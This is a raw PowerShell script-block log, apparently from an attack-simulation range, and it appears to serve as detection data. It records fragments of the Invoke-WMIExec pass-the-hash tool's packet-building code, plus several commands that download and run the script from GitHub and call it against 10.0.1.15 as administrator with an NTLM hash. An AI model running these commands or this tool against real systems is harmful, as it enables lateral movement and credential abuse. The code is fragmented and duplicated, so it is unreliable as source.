$packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemQueryInterface.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemQueryInterface.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("CausalityID",$packet_causality_Icc727ffd-1e37-4459-8411-97e82a1d0dab 4104152150x0723794Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}00fc550b-9154-49ff-828f-52f5a6c6f019 4104152150x0723792Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}a88a838f-fa66-4e4e-b9c0-52c5fcf64133 4104132150x0723301Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local16function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemQueryInterface.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemQueryInterface.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemQueryInterface.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IPID",$packet_IPID) $packet_DCOMRemQueryInterface.Add("Refs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IIDs",[Byte[]](0x01,0x00)) $packet_DCOMRemQueryInterface.Add("Unknown",[Byte[]](0x00,0x00,0x01,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IID",$packet_IID) return $packet_DCOMRemQueryInterface } function New-PacketDCOMRemRelease { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IPID2) $packet_DCOMRemRelease = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemRelease.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemRelease.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemRelease.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemRelease.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Unknown",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("InterfaceRefs",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("IPID",$packet_IPID) $packet_DCOMRemRelease.Add("PublicRefs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("PrivateRefs",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("IPID2",$packet_IPID2) $packet_DCOMRemRelease.Add("PublicRefs2",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("PrivateRefs2",[Byte[]](0x00,0x00,0x00,0x00)) return $packet_DCOMRemRelease } function New-PacketDCOMRemoteCreateInstance { param([Byte[]]$packet_causality_ID,[String]$packet_target) [Byte[]]$packet_target_unicode = [System.Text.Encoding]::Unicode.GetBytes($packet_target) [Byte[]]$packet_target_length = [System.BitConverter]::GetBytes($packet_target.Length + 1) $packet_target_unicode += ,0x00 * (([Math]::Truncate($packet_target_unicode.Length / 8 + 1) * 8) - $packet_target_unicode.Length) [Byte[]]$packet_cntdata = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 720) [Byte[]]$packet_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 680) [Byte[]]$packet_total_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 664) [Byte[]]$packet_private_header = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 40) + 0x00,0x00,0x00,0x00 [Byte[]]$packet_property_data_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 56) $packet_DCOMRemoteCreateInstance = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMFlags",[Byte[]](0x01,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMReserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMCausalityID",$packet_causality_ID) $packet_DCOMRemoteCreateInstance.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown3",[Byte[]](0x00,0x00,0x02,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown4",$packet_cntdata) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCntData",$packet_cntdata) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFSignature",[Byte[]](0x4d,0x45,0x4f,0x57)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFFlags",[Byte[]](0x04,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFIID",[Byte[]](0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0ef506bfd-65bc-4042-83d3-64a9e39e4355 4104152150x0723295Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}9e08ac24-759e-4106-a2ff-78d6c8eaefb8 